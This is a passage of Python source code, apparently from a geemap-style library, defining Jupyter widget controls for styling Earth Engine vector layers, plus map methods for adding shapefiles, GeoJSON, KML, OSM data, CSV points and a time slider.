)
label = widgets.Label(value=f"{layer_name} visualization parameters")
new_layer_name = widgets.Text(
value=f"{layer_name} style",
description="New layer name:",
style={"description_width": "initial"},
)
color = widgets.ColorPicker(
concise=False,
value="#000000",
description="Color:",
layout=widgets.Layout(width="140px"),
style={"description_width": "initial"},
)
color_opacity = widgets.FloatSlider(
value=layer_opacity,
min=0,
max=1,
step=0.01,
description="Opacity:",
continuous_update=True,
readout=False,
# readout_format=".2f",
layout=widgets.Layout(width="130px"),
style={"description_width": "50px"},
)
color_opacity_label = widgets.Label(
style={"description_width": "initial"},
layout=widgets.Layout(padding="0px"),
)
widgets.jslink((color_opacity, "value"), (color_opacity_label, "value"))
point_size = widgets.IntText(
value=3,
description="Point size:",
layout=widgets.Layout(width="110px"),
style={"description_width": "initial"},
)
point_shape_options = [
"circle",
"square",
"diamond",
"cross",
"plus",
"pentagram",
"hexagram",
"triangle",
"triangle_up",
"triangle_down",
"triangle_left",
"triangle_right",
"pentagon",
"hexagon",
"star5",
"star6",
]
point_shape = widgets.Dropdown(
options=point_shape_options,
value="circle",
description="Point shape:",
layout=widgets.Layout(width="185px"),
style={"description_width": "initial"},
)
line_width = widgets.IntText(
value=2,
description="Line width:",
layout=widgets.Layout(width="110px"),
style={"description_width": "initial"},
)
line_type = widgets.Dropdown(
options=["solid", "dotted", "dashed"],
value="solid",
description="Line type:",
layout=widgets.Layout(width="185px"),
style={"description_width": "initial"},
)
fill_color = widgets.ColorPicker(
concise=False,
value="#000000",
description="Fill Color:",
layout=widgets.Layout(width="160px"),
style={"description_width": "initial"},
)
fill_color_opacity = widgets.FloatSlider(
value=0.66,
min=0,
max=1,
step=0.01,
description="Opacity:",
continuous_update=True,
readout=False,
# readout_format=".2f",
layout=widgets.Layout(width="110px"),
style={"description_width": "50px"},
)
fill_color_opacity_label = widgets.Label(
style={"description_width": "initial"},
layout=widgets.Layout(padding="0px"),
)
widgets.jslink(
(fill_color_opacity, "value"),
(fill_color_opacity_label, "value"),
)
color_picker = widgets.ColorPicker(
concise=False,
value="#000000",
layout=widgets.Layout(width="116px"),
style={"description_width": "initial"},
)
add_color = widgets.Button(
icon="plus",
tooltip="Add a hex color string to the palette",
layout=widgets.Layout(width="32px"),
)
del_color = widgets.Button(
icon="minus",
tooltip="Remove a hex color string from the palette",
layout=widgets.Layout(width="32px"),
)
reset_color = widgets.Button(
icon="eraser",
tooltip="Remove all color strings from the palette",
layout=widgets.Layout(width="34px"),
)
palette = widgets.Text(
value="",
placeholder="List of hex code (RRGGBB) separated by comma",
description="Palette:",
tooltip="Enter a list of hex code (RRGGBB) separated by comma",
layout=widgets.Layout(width="300px"),
style={"description_width": "initial"},
)
legend_title = widgets.Text(
value="Legend",
description="Legend title:",
tooltip="Enter a title for the legend",
layout=widgets.Layout(width="300px"),
style={"description_width": "initial"},
)
legend_labels = widgets.Text(
value="Labels",
description="Legend labels:",
tooltip="Enter a a list of labels for the legend",
layout=widgets.Layout(width="300px"),
style={"description_width": "initial"},
)
def add_color_clicked(b):
if color_picker.value is not None:
if len(palette.value) == 0:
palette.value = color_picker.value[1:]
else:
palette.value += ", " + color_picker.value[1:]
def del_color_clicked(b):
if "," in palette.value:
items = [item.strip() for item in palette.value.split(",")]
palette.value = ", ".join(items[:-1])
else:
palette.value = ""
def reset_color_clicked(b):
palette.value = ""
add_color.on_click(add_color_clicked)
del_color.on_click(del_color_clicked)
reset_color.on_click(reset_color_clicked)
field = widgets.Dropdown(
options=[],
value=None,
description="Field:",
layout=widgets.Layout(width="140px"),
style={"description_width": "initial"},
)
field_values = widgets.Dropdown(
options=[],
value=None,
description="Values:",
layout=widgets.Layout(width="156px"),
style={"description_width": "initial"},
)
classes = widgets.Dropdown(
options=["Any"] + [str(i) for i in range(3, 13)],
description="Classes:",
layout=widgets.Layout(width="115px"),
style={"description_width": "initial"},
)
colormap = widgets.Dropdown(
options=["viridis"],
value="viridis",
description="Colormap:",
layout=widgets.Layout(width="181px"),
style={"description_width": "initial"},
)
def classes_changed(change):
if change["new"]:
selected = change["owner"].value
if colormap.value is not None:
n_class = None
if selected != "Any":
n_class = int(classes.value)
colors = plt.cm.get_cmap(colormap.value, n_class)
cmap_colors = [
mpl.colors.rgb2hex(colors(i))[1:] for i in range(colors.N)
]
_, ax = plt.subplots(figsize=(6, 0.4))
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"custom", to_hex_colors(cmap_colors), N=256
)
norm = mpl.colors.Normalize(vmin=0, vmax=1)
mpl.colorbar.ColorbarBase(
ax, norm=norm, cmap=cmap, orientation="horizontal"
)
palette.value = ", ".join([color for color in cmap_colors])
if self.colorbar_widget is None:
self.colorbar_widget = widgets.Output(
layout=widgets.Layout(height="60px")
)
if self.colorbar_ctrl is None:
self.colorbar_ctrl = ipyleaflet.WidgetControl(
widget=self.colorbar_widget, position="bottomright"
)
self.add_control(self.colorbar_ctrl)
colorbar_output = self.colorbar_widget
with colorbar_output:
colorbar_output.clear_output()
plt.show()
if len(palette.value) > 0 and "," in palette.value:
labels = [
f"Class {i+1}"
for i in range(len(palette.value.split(",")))
]
legend_labels.value = ", ".join(labels)
classes.observe(classes_changed, "value")
def colormap_changed(change):
if change["new"]:
n_class = None
if classes.value != "Any":
n_class = int(classes.value)
colors = plt.cm.get_cmap(colormap.value, n_class)
cmap_colors = [
mpl.colors.rgb2hex(colors(i))[1:] for i in range(colors.N)
]
_, ax = plt.subplots(figsize=(6, 0.4))
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"custom", to_hex_colors(cmap_colors), N=256
)
norm = mpl.colors.Normalize(vmin=0, vmax=1)
mpl.colorbar.ColorbarBase(
ax, norm=norm, cmap=cmap, orientation="horizontal"
)
palette.value = ", ".join(cmap_colors)
if self.colorbar_widget is None:
self.colorbar_widget = widgets.Output(
layout=widgets.Layout(height="60px")
)
if self.colorbar_ctrl is None:
self.colorbar_ctrl = ipyleaflet.WidgetControl(
widget=self.colorbar_widget, position="bottomright"
)
self.add_control(self.colorbar_ctrl)
colorbar_output = self.colorbar_widget
with colorbar_output:
colorbar_output.clear_output()
plt.show()
# display(colorbar)
if len(palette.value) > 0 and "," in palette.value:
labels = [
f"Class {i+1}" for i in range(len(palette.value.split(",")))
]
legend_labels.value = ", ".join(labels)
colormap.observe(colormap_changed, "value")
btn_width = "97.5px"
import_btn = widgets.Button(
description="Import",
button_style="primary",
tooltip="Import vis params to notebook",
layout=widgets.Layout(width=btn_width),
)
apply_btn = widgets.Button(
description="Apply",
tooltip="Apply vis params to the layer",
layout=widgets.Layout(width=btn_width),
)
close_btn = widgets.Button(
description="Close",
tooltip="Close vis params diaglog",
layout=widgets.Layout(width=btn_width),
)
style_chk = widgets.Checkbox(
value=False,
description="Style by attribute",
indent=False,
layout=widgets.Layout(width="140px"),
)
legend_chk = widgets.Checkbox(
value=False,
description="Legend",
indent=False,
layout=widgets.Layout(width="70px"),
)
compute_label = widgets.Label(value="")
style_vbox = widgets.VBox([widgets.HBox([style_chk, compute_label])])
def style_chk_changed(change):
if change["new"]:
if (
self.colorbar_ctrl is not None
and self.colorbar_ctrl in self.controls
):
self.remove_control(self.colorbar_ctrl)
self.colorbar_ctrl.close()
self.colorbar_widget.close()
self.colorbar_widget = widgets.Output(
layout=widgets.Layout(height="60px")
)
self.colorbar_ctrl = ipyleaflet.WidgetControl(
widget=self.colorbar_widget, position="bottomright"
)
self.add_control(self.colorbar_ctrl)
fill_color.disabled = True
colormap.options = plt.colormaps()
colormap.value = "viridis"
style_vbox.children = [
widgets.HBox([style_chk, compute_label]),
widgets.HBox([field, field_values]),
widgets.HBox([classes, colormap]),
palette,
widgets.HBox(
[
legend_chk,
color_picker,
add_color,
del_color,
reset_color,
]
),
]
compute_label.value = "Computing ..."
field.options = (
ee.Feature(ee_object.first()).propertyNames().getInfo()
)
compute_label.value = ""
classes.value = "Any"
legend_chk.value = False
else:
fill_color.disabled = False
style_vbox.children = [widgets.HBox([style_chk, compute_label])]
compute_label.value = ""
if (
self.colorbar_ctrl is not None
and self.colorbar_ctrl in self.controls
):
self.remove_control(self.colorbar_ctrl)
self.colorbar_ctrl = None
self.colorbar_widget = None
# legend_chk.value = False
style_chk.observe(style_chk_changed, "value")
def legend_chk_changed(change):
if change["new"]:
style_vbox.children = list(style_vbox.children) + [
widgets.VBox([legend_title, legend_labels])
]
if len(palette.value) > 0 and "," in palette.value:
labels = [
f"Class {i+1}" for i in range(len(palette.value.split(",")))
]
legend_labels.value = ", ".join(labels)
else:
style_vbox.children = [
widgets.HBox([style_chk, compute_label]),
widgets.HBox([field, field_values]),
widgets.HBox([classes, colormap]),
palette,
widgets.HBox(
[
legend_chk,
color_picker,
add_color,
del_color,
reset_color,
]
),
]
legend_chk.observe(legend_chk_changed, "value")
def field_changed(change):
if change["new"]:
compute_label.value = "Computing ..."
options = ee_object.aggregate_array(field.value).getInfo()
if options is not None:
options = list(set(options))
options.sort()
field_values.options = options
compute_label.value = ""
field.observe(field_changed, "value")
def get_vis_params():
vis = {}
vis["color"] = color.value[1:] + str(
hex(int(color_opacity.value * 255))
)[2:].zfill(2)
if geometry_type(ee_object) in ["Point", "MultiPoint"]:
vis["pointSize"] = point_size.value
vis["pointShape"] = point_shape.value
vis["width"] = line_width.value
vis["lineType"] = line_type.value
vis["fillColor"] = fill_color.value[1:] + str(
hex(int(fill_color_opacity.value * 255))
)[2:].zfill(2)
return vis
def import_btn_clicked(b):
vis = get_vis_params()
create_code_cell(f"vis_params = {str(vis)}")
def apply_btn_clicked(b):
compute_label.value = "Computing ..."
if new_layer_name.value in self.ee_layer_names:
old_layer = new_layer_name.value
if "legend" in self.ee_layer_dict[old_layer].keys():
legend = self.ee_layer_dict[old_layer]["legend"]
if legend in self.controls:
self.remove_control(legend)
legend.close()
if "colorbar" in self.ee_layer_dict[old_layer].keys():
colorbar = self.ee_layer_dict[old_layer]["colorbar"]
if colorbar in self.controls:
self.remove_control(colorbar)
colorbar.close()
if not style_chk.value:
vis = get_vis_params()
self.addLayer(ee_object.style(**vis), {}, new_layer_name.value)
ee_layer.visible = False
elif (
style_chk.value and len(palette.value) > 0 and "," in palette.value
):
colors = ee.List(
[
color.strip()
+ str(hex(int(fill_color_opacity.value * 255)))[2:].zfill(2)
for color in palette.value.split(",")
]
)
arr = ee_object.aggregate_array(field.value).distinct().sort()
fc = ee_object.map(
lambda f: f.set({"styleIndex": arr.indexOf(f.get(field.value))})
)
step = arr.size().divide(colors.size()).ceil()
fc = fc.map(
lambda f: f.set(
{
"style": {
"color": color.value[1:]
+ str(hex(int(color_opacity.value * 255)))[
2:
].zfill(2),
"pointSize": point_size.value,
"pointShape": point_shape.value,
"width": line_width.value,
"lineType": line_type.value,
"fillColor": colors.get(
ee.Number(
ee.Number(f.get("styleIndex")).divide(step)
).floor()
),
}
}
)
)
self.addLayer(
fc.style(**{"styleProperty": "style"}),
{},
f"{new_layer_name.value}",
)
if (
len(palette.value)
and legend_chk.value
and len(legend_labels.value) > 0
):
legend_colors = [
color.strip() for color in palette.value.split(",")
]
legend_keys = [
label.strip() for label in legend_labels.value.split(",")
]
self.add_legend(
legend_title=legend_title.value,
legend_keys=legend_keys,
legend_colors=legend_colors,
layer_name=new_layer_name.value,
)
ee_layer.visible = False
compute_label.value = ""
def close_btn_clicked(b):
self.remove_control(self.vis_control)
self.vis_control.close()
self.vis_widget.close()
if (
self.colorbar_ctrl is not None
and self.colorbar_ctrl in self.controls
):
self.remove_control(self.colorbar_ctrl)
self.colorbar_ctrl.close()
self.colorbar_widget.close()
import_btn.on_click(import_btn_clicked)
apply_btn.on_click(apply_btn_clicked)
close_btn.on_click(close_btn_clicked)
vis_widget.children = [
label,
new_layer_name,
widgets.HBox([color, color_opacity, color_opacity_label]),
widgets.HBox([point_size, point_shape]),
widgets.HBox([line_width, line_type]),
widgets.HBox(
[fill_color, fill_color_opacity, fill_color_opacity_label]
),
style_vbox,
widgets.HBox([import_btn, apply_btn, close_btn]),
]
if geometry_type(ee_object) in ["Point", "MultiPoint"]:
point_size.disabled = False
point_shape.disabled = False
else:
point_size.disabled = True
point_shape.disabled = True
return vis_widget
def add_styled_vector(
self, ee_object, column, palette, layer_name="Untitled", **kwargs
):
"""Adds a styled vector to the map.
Args:
ee_object (object): An ee.FeatureCollection.
column (str): The column name to use for styling.
palette (list | dict): The palette (e.g., list of colors or a dict containing label and color pairs) to use for styling.
layer_name (str, optional): The name to be used for the new layer. Defaults to "Untitled".
"""
styled_vector = vector_styling(ee_object, column, palette, **kwargs)
self.addLayer(styled_vector.style(**{"styleProperty": "style"}), {}, layer_name)
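# Usage sketch (illustrative, not part of the module): styling a FeatureCollection
# by an attribute column. The asset ID, column name, and palette below are
# assumptions; ee.Initialize() is presumed to have been called.
#
#   m = Map()
#   states = ee.FeatureCollection("TIGER/2018/States")
#   m.add_styled_vector(states, column="NAME",
#                       palette=["006633", "E5FFCC", "662A00"],
#                       layer_name="Styled states")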
def add_shapefile(
self,
in_shp,
layer_name="Untitled",
style={},
hover_style={},
style_callback=None,
fill_colors=["black"],
info_mode="on_hover",
):
"""Adds a shapefile to the map.
Args:
in_shp (str): The input file path to the shapefile.
layer_name (str, optional): The layer name to be used. Defaults to "Untitled".
style (dict, optional): A dictionary specifying the style to be used. Defaults to {}.
hover_style (dict, optional): Hover style dictionary. Defaults to {}.
style_callback (function, optional): Styling function that is called for each feature, and should return the feature style. This styling function takes the feature as argument. Defaults to None.
fill_colors (list, optional): The random colors to use for filling polygons. Defaults to ["black"].
info_mode (str, optional): Displays the attributes by either on_hover or on_click. Any value other than "on_hover" or "on_click" will be treated as None. Defaults to "on_hover".
Raises:
FileNotFoundError: The provided shapefile could not be found.
"""
in_shp = os.path.abspath(in_shp)
if not os.path.exists(in_shp):
raise FileNotFoundError("The provided shapefile could not be found.")
geojson = shp_to_geojson(in_shp)
self.add_geojson(
geojson,
layer_name,
style,
hover_style,
style_callback,
fill_colors,
info_mode,
)
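# Usage sketch (illustrative): adding a local shapefile. The file path below is
# a hypothetical example.
#
#   m = Map()
#   m.add_shapefile("data/countries.shp", layer_name="Countries",
#                   style={"color": "#0000ff", "weight": 1, "fillOpacity": 0.1})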
def add_geojson(
self,
in_geojson,
layer_name="Untitled",
style={},
hover_style={},
style_callback=None,
fill_colors=["black"],
info_mode="on_hover",
):
"""Adds a GeoJSON file to the map.
Args:
in_geojson (str | dict): The file path or http URL to the input GeoJSON or a dictionary containing the geojson.
layer_name (str, optional): The layer name to be used. Defaults to "Untitled".
style (dict, optional): A dictionary specifying the style to be used. Defaults to {}.
hover_style (dict, optional): Hover style dictionary. Defaults to {}.
style_callback (function, optional): Styling function that is called for each feature, and should return the feature style. This styling function takes the feature as argument. Defaults to None.
fill_colors (list, optional): The random colors to use for filling polygons. Defaults to ["black"].
info_mode (str, optional): Displays the attributes by either on_hover or on_click. Any value other than "on_hover" or "on_click" will be treated as None. Defaults to "on_hover".
Raises:
FileNotFoundError: The provided GeoJSON file could not be found.
"""
import json
import random
import requests
try:
if isinstance(in_geojson, str):
if in_geojson.startswith("http"):
data = requests.get(in_geojson).json()
else:
in_geojson = os.path.abspath(in_geojson)
if not os.path.exists(in_geojson):
raise FileNotFoundError(
"The provided GeoJSON file could not be found."
)
with open(in_geojson, encoding="utf-8") as f:
data = json.load(f)
elif isinstance(in_geojson, dict):
data = in_geojson
else:
raise TypeError("The input geojson must be a type of str or dict.")
except Exception as e:
raise Exception(e)
if not style:
style = {
# "stroke": True,
"color": "#000000",
"weight": 1,
"opacity": 1,
# "fill": True,
# "fillColor": "#ffffff",
"fillOpacity": 0.1,
# "dashArray": "9"
# "clickable": True,
}
elif "weight" not in style:
style["weight"] = 1
if not hover_style:
hover_style = {"weight": style["weight"] + 1, "fillOpacity": 0.5}
def random_color(feature):
return {
"color": "black",
"fillColor": random.choice(fill_colors),
}
toolbar_button = widgets.ToggleButton(
value=True,
tooltip="Toolbar",
icon="info",
layout=widgets.Layout(
width="28px", height="28px", padding="0px 0px 0px 4px"
),
)
close_button = widgets.ToggleButton(
value=False,
tooltip="Close the tool",
icon="times",
# button_style="primary",
layout=widgets.Layout(
height="28px", width="28px", padding="0px 0px 0px 4px"
),
)
html = widgets.HTML()
html.layout.margin = "0px 10px 0px 10px"
html.layout.max_height = "250px"
html.layout.max_width = "250px"
output_widget = widgets.VBox(
[widgets.HBox([toolbar_button, close_button]), html]
)
info_control = ipyleaflet.WidgetControl(
widget=output_widget, position="bottomright"
)
if info_mode in ["on_hover", "on_click"]:
self.add_control(info_control)
def toolbar_btn_click(change):
if change["new"]:
close_button.value = False
output_widget.children = [
widgets.VBox([widgets.HBox([toolbar_button, close_button]), html])
]
else:
output_widget.children = [widgets.HBox([toolbar_button, close_button])]
toolbar_button.observe(toolbar_btn_click, "value")
def close_btn_click(change):
if change["new"]:
toolbar_button.value = False
if info_control in self.controls:
self.remove_control(info_control)
output_widget.close()
close_button.observe(close_btn_click, "value")
def update_html(feature, **kwargs):
value = [
"<h5><b>{}: </b>{}</h5>".format(prop, feature["properties"][prop])
for prop in feature["properties"].keys()
][:-1]
value = """{}""".format("".join(value))
html.value = value
if style_callback is None:
style_callback = random_color
geojson = ipyleaflet.GeoJSON(
data=data,
style=style,
hover_style=hover_style,
style_callback=style_callback,
name=layer_name,
)
if info_mode == "on_hover":
geojson.on_hover(update_html)
elif info_mode == "on_click":
geojson.on_click(update_html)
self.add_layer(geojson)
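# Usage sketch (illustrative): adding GeoJSON from a URL or a local file. The
# URL below is a placeholder, not a real dataset.
#
#   m = Map()
#   m.add_geojson("https://example.com/countries.geojson",
#                 layer_name="Countries", info_mode="on_click")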
def add_kml(
self,
in_kml,
layer_name="Untitled",
style={},
hover_style={},
style_callback=None,
fill_colors=["black"],
info_mode="on_hover",
):
"""Adds a GeoJSON file to the map.
Args:
in_kml (str): The input file path to the KML.
layer_name (str, optional): The layer name to be used. Defaults to "Untitled".
style (dict, optional): A dictionary specifying the style to be used. Defaults to {}.
hover_style (dict, optional): Hover style dictionary. Defaults to {}.
style_callback (function, optional): Styling function that is called for each feature, and should return the feature style. This styling function takes the feature as argument. Defaults to None.
fill_colors (list, optional): The random colors to use for filling polygons. Defaults to ["black"].
info_mode (str, optional): Displays the attributes by either on_hover or on_click. Any value other than "on_hover" or "on_click" will be treated as None. Defaults to "on_hover".
Raises:
FileNotFoundError: The provided KML file could not be found.
"""
in_kml = os.path.abspath(in_kml)
if not os.path.exists(in_kml):
raise FileNotFoundError("The provided KML file could not be found.")
self.add_vector(
in_kml,
layer_name,
style=style,
hover_style=hover_style,
style_callback=style_callback,
fill_colors=fill_colors,
info_mode=info_mode,
)
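# Usage sketch (illustrative): the KML path below is a hypothetical example.
#
#   m = Map()
#   m.add_kml("data/boundaries.kml", layer_name="Boundaries")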
def add_vector(
self,
filename,
layer_name="Untitled",
to_ee=False,
bbox=None,
mask=None,
rows=None,
style={},
hover_style={},
style_callback=None,
fill_colors=["black"],
info_mode="on_hover",
**kwargs,
):
"""Adds any geopandas-supported vector dataset to the map.
Args:
filename (str): Either the absolute or relative path to the file or URL to be opened, or any object with a read() method (such as an open file or StringIO).
layer_name (str, optional): The layer name to use. Defaults to "Untitled".
to_ee (bool, optional): Whether to convert the GeoJSON to ee.FeatureCollection. Defaults to False.
bbox (tuple | GeoDataFrame or GeoSeries | shapely Geometry, optional): Filter features by given bounding box, GeoSeries, GeoDataFrame or a shapely geometry. CRS mis-matches are resolved if given a GeoSeries or GeoDataFrame. Cannot be used with mask. Defaults to None.
mask (dict | GeoDataFrame or GeoSeries | shapely Geometry, optional): Filter for features that intersect with the given dict-like geojson geometry, GeoSeries, GeoDataFrame or shapely geometry. CRS mis-matches are resolved if given a GeoSeries or GeoDataFrame. Cannot be used with bbox. Defaults to None.
rows (int or slice, optional): Load in specific rows by passing an integer (first n rows) or a slice() object. Defaults to None.
style (dict, optional): A dictionary specifying the style to be used. Defaults to {}.
hover_style (dict, optional): Hover style dictionary. Defaults to {}.
style_callback (function, optional): Styling function that is called for each feature, and should return the feature style. This styling function takes the feature as argument. Defaults to None.
fill_colors (list, optional): The random colors to use for filling polygons. Defaults to ["black"].
info_mode (str, optional): Displays the attributes by either on_hover or on_click. Any value other than "on_hover" or "on_click" will be treated as None. Defaults to "on_hover".
"""
if not filename.startswith("http"):
filename = os.path.abspath(filename)
if to_ee:
fc = vector_to_ee(
filename,
bbox=bbox,
mask=mask,
rows=rows,
geodesic=True,
**kwargs,
)
self.addLayer(fc, {}, layer_name)
else:
ext = os.path.splitext(filename)[1].lower()
if ext == ".shp":
self.add_shapefile(
filename,
layer_name,
style,
hover_style,
style_callback,
fill_colors,
info_mode,
)
elif ext in [".json", ".geojson"]:
self.add_geojson(
filename,
layer_name,
style,
hover_style,
style_callback,
fill_colors,
info_mode,
)
else:
geojson = vector_to_geojson(
filename,
bbox=bbox,
mask=mask,
rows=rows,
epsg="4326",
**kwargs,
)
self.add_geojson(
geojson,
layer_name,
style,
hover_style,
style_callback,
fill_colors,
info_mode,
)
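# Usage sketch (illustrative): add_vector dispatches on file extension, so any
# geopandas-readable format works. The GeoPackage path is a hypothetical example.
#
#   m = Map()
#   m.add_vector("data/parcels.gpkg", layer_name="Parcels")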
def add_osm(
self,
query,
layer_name="Untitled",
style={},
hover_style={},
style_callback=None,
fill_colors=["black"],
info_mode="on_hover",
which_result=None,
by_osmid=False,
buffer_dist=None,
to_ee=False,
geodesic=True,
):
"""Adds OSM data to the map.
Args:
query (str | dict | list): Query string(s) or structured dict(s) to geocode.
layer_name (str, optional): The layer name to be used. Defaults to "Untitled".
style (dict, optional): A dictionary specifying the style to be used. Defaults to {}.
hover_style (dict, optional): Hover style dictionary. Defaults to {}.
style_callback (function, optional): Styling function that is called for each feature, and should return the feature style. This styling function takes the feature as argument. Defaults to None.
fill_colors (list, optional): The random colors to use for filling polygons. Defaults to ["black"].
info_mode (str, optional): Displays the attributes by either on_hover or on_click. Any value other than "on_hover" or "on_click" will be treated as None. Defaults to "on_hover".
which_result (int, optional): Which geocoding result to use. If None, auto-select the first (Multi)Polygon or raise an error if OSM doesn't return one. To get the top match regardless of geometry type, set which_result=1. Defaults to None.
by_osmid (bool, optional): If True, handle query as an OSM ID for lookup rather than text search. Defaults to False.
buffer_dist (float, optional): Distance to buffer around the place geometry, in meters. Defaults to None.
to_ee (bool, optional): Whether to convert the OSM data to an ee.FeatureCollection. Defaults to False.
geodesic (bool, optional): Whether line segments should be interpreted as spherical geodesics. If false, indicates that line segments should be interpreted as planar lines in the specified CRS. If absent, defaults to true if the CRS is geographic (including the default EPSG:4326), or to false if the CRS is projected.
"""
gdf = osm_to_geopandas(
query, which_result=which_result, by_osmid=by_osmid, buffer_dist=buffer_dist
)
geojson = gdf.__geo_interface__
if to_ee:
fc = geojson_to_ee(geojson, geodesic=geodesic)
self.addLayer(fc, {}, layer_name)
self.zoomToObject(fc)
else:
self.add_geojson(
geojson,
layer_name=layer_name,
style=style,
hover_style=hover_style,
style_callback=style_callback,
fill_colors=fill_colors,
info_mode=info_mode,
)
bounds = gdf.bounds.iloc[0]
self.fit_bounds([[bounds[1], bounds[0]], [bounds[3], bounds[2]]])
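# Usage sketch (illustrative): the query string below is an example; the
# osm_to_geopandas() helper is assumed to handle the geocoding.
#
#   m = Map()
#   m.add_osm("New York City", layer_name="NYC boundary", buffer_dist=1000)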
def add_time_slider(
self,
ee_object,
vis_params={},
region=None,
layer_name="Time series",
labels=None,
time_interval=1,
position="bottomright",
slider_length="150px",
date_format="YYYY-MM-dd",
):
"""Adds a time slider to the map.
Args:
ee_object (ee.Image | ee.ImageCollection): The Image or ImageCollection to visualize.
vis_params (dict, optional): Visualization parameters to use for visualizing image. Defaults to {}.
region (ee.Geometry | ee.FeatureCollection): The region to visualize.
layer_name (str, optional): The layer name to be used. Defaults to "Time series".
labels (list, optional): The list of labels to be used for the time series. Defaults to None.
time_interval (int, optional): Time interval in seconds. Defaults to 1.
position (str, optional): Position to place the time slider, can be any of ['topleft', 'topright', 'bottomleft', 'bottomright']. Defaults to "bottomright".
slider_length (str, optional): Length of the time slider. Defaults to "150px".
date_format (str, optional): The date format to use. Defaults to 'YYYY-MM-dd'.
Raises:
TypeError: If the ee_object is not ee.Image | ee.ImageCollection.
"""
import threading
if isinstance(ee_object, ee.Image):
if region is not None:
if isinstance(region, ee.Geometry):
ee_object = ee_object.clip(region)
elif isinstance(region, ee.FeatureCollection):
ee_object = ee_object.clipToCollection(region)
if layer_name not in self.ee_raster_layer_names:
self.addLayer(ee_object, {}, layer_name, False)
band_names = ee_object.bandNames()
ee_object = ee.ImageCollection(
ee_object.bandNames().map(lambda b: ee_object.select([b]))
)
if labels is not None:
if len(labels) != int(ee_object.size().getInfo()):
raise ValueError(
"The length of labels must be equal to the number of bands in the image."
)
else:
labels = band_names.getInfo()
elif isinstance(ee_object, ee.ImageCollection):
if region is not None:
if isinstance(region, ee.Geometry):
ee_object = ee_object.map(lambda img: img.clip(region))
elif isinstance(region, ee.FeatureCollection):
ee_object = ee_object.map(lambda img: img.clipToCollection(region))
if labels is not None:
if len(labels) != int(ee_object.size().getInfo()):
raise ValueError(
"The length of labels must be equal to the number of images in the ImageCollection."
)
else:
labels = (
ee_object.aggregate_array("system:time_start")
.map(lambda d: ee.Date(d).format(date_format))
.getInfo()
)
else:
raise TypeError("The ee_object must be an ee.Image or ee.ImageCollection")
# if labels is not None:
# size = len(labels)
# else:
# size = ee_object.size().getInfo()
# labels = [str(i) for i in range(1, size + 1)]
first = ee.Image(ee_object.first())
if layer_name not in self.ee_raster_layer_names:
self.addLayer(ee_object.toBands(), {}, layer_name, False)
self.addLayer(first, vis_params, "Image X")
slider = widgets.IntSlider(
min=1,
max=len(labels),
readout=False,
continuous_update=False,
layout=widgets.Layout(width=slider_length),
)
label = widgets.Label(
value=labels[0], layout=widgets.Layout(padding="0px 5px 0px 5px")
)
play_btn = widgets.Button(
icon="play",
tooltip="Play the time slider",
button_style="primary",
layout=widgets.Layout(width="32px"),
)
pause_btn = widgets.Button(
icon="pause",
tooltip="Pause the time slider",
button_style="primary",
layout=widgets.Layout(width="32px"),
)
close_btn = widgets.Button(
icon="times",
tooltip="Close the time slider",
button_style="primary",
layout=widgets.Layout(width="32px"),
)
play_chk = widgets.Checkbox(value=False)
slider_widget = widgets.HBox([slider, label, play_btn, pause_btn, close_btn])
def play_click(b):
play_chk.value = True
def work(slider):
while play_chk.value:
if slider.value < len(labels):
slider.value += 1
else:
slider.value = 1
time.sleep(time_interval)
thread = threading.Thread(target=work, args=(slider,))
thread.start()
def pause_click(b):
play_chk.value = False
play_btn.on_click(play_click)
pause_btn.on_click(pause_click)
def slider_changed(change):
self.default_style = {"cursor": "wait"}
index = slider.value - 1
label.value = labels[index]
image = ee.Image(ee_object.toList(ee_object.size()).get(index))
if layer_name not in self.ee_raster_layer_names:
self.addLayer(ee_object.toBands(), {}, layer_name, False)
self.addLayer(image, vis_params, "Image X")
self.default_style = {"cursor": "default"}
slider.observe(slider_changed, "value")
def close_click(b):
play_chk.value = False
self.toolbar_reset()
self.remove_ee_layer("Image X")
self.remove_ee_layer(layer_name)
if self.slider_ctrl is not None and self.slider_ctrl in self.controls:
self.remove_control(self.slider_ctrl)
slider_widget.close()
close_btn.on_click(close_click)
slider_ctrl = ipyleaflet.WidgetControl(widget=slider_widget, position=position)
self.add_control(slider_ctrl)
self.slider_ctrl = slider_ctrl
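# Usage sketch (illustrative): animating a Sentinel-2 collection. The asset ID,
# filters, and vis_params are assumptions; ee.Initialize() is presumed.
#
#   m = Map()
#   col = (ee.ImageCollection("COPERNICUS/S2_SR")
#          .filterDate("2021-06-01", "2021-09-01")
#          .filterBounds(ee.Geometry.Point([-83.0, 42.3])))
#   m.add_time_slider(col, vis_params={"bands": ["B4", "B3", "B2"], "max": 3000},
#                     time_interval=2)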
def add_xy_data(
self,
in_csv,
x="longitude",
y="latitude",
label=None,
layer_name="Marker cluster",
to_ee=False,
):
"""Adds points from a CSV file containing lat/lon information and display data on the map.
Args:
in_csv (str): The file path to the input CSV file.
x (str, optional): The name of the column containing longitude coordinates. Defaults to "longitude".
y (str, optional): The name of the column containing latitude coordinates. Defaults to "latitude".
label (str, optional): The name of the column containing label information to be used for the marker popup. Defaults to None.
layer_name (str, optional): The layer name to use. Defaults to "Marker cluster".
to_ee (bool, optional): Whether to convert the csv to an ee.FeatureCollection.
Raises:
FileNotFoundError: The specified input csv does not exist.
ValueError: The specified x column does not exist.
ValueError: The specified y column does not exist.
ValueError: The specified label column does not exist.
"""
import pandas as pd
if not in_csv.startswith("http") and (not os.path.exists(in_csv)):
raise FileNotFoundError("The specified input csv does not exist.")
df = pd.read_csv(in_csv)
col_names = df.columns.values.tolist()
if x not in col_names:
raise ValueError(f"x must be one of the following: {', '.join(col_names)}")
if y not in col_names:
raise ValueError(f"y must be one of the following: {', '.join(col_names)}")
if label is not None and (label not in col_names):
raise ValueError(
f"label must be one of the following: {', '.join(col_names)}"
)
self.default_style = {"cursor": "wait"}
if to_ee:
fc = csv_to_ee(in_csv, latitude=y, longitude=x)
self.addLayer(fc, {}, layer_name)
else:
points = list(zip(df[y], df[x]))
if label is not None:
labels = df[label]
markers = [
ipyleaflet.Marker(
location=point,
draggable=False,
popup=widgets.HTML(str(labels[index])),
)
for index, point in enumerate(points)
]
else:
markers = [
ipyleaflet.Marker(location=point, draggable=False)
for point in points
]
marker_cluster = ipyleaflet.MarkerCluster(markers=markers, name=layer_name)
self.add_layer(marker_cluster)
self.default_style = {"cursor": "default"}
def add_planet_by_month(
self, year=2016, month=1, name=None, api_key=None, token_name="PLANET_API_KEY"
):
"""Adds a Planet global mosaic by month to the map. To get a Planet API key, see https://developers.planet.com/quickstart/apis
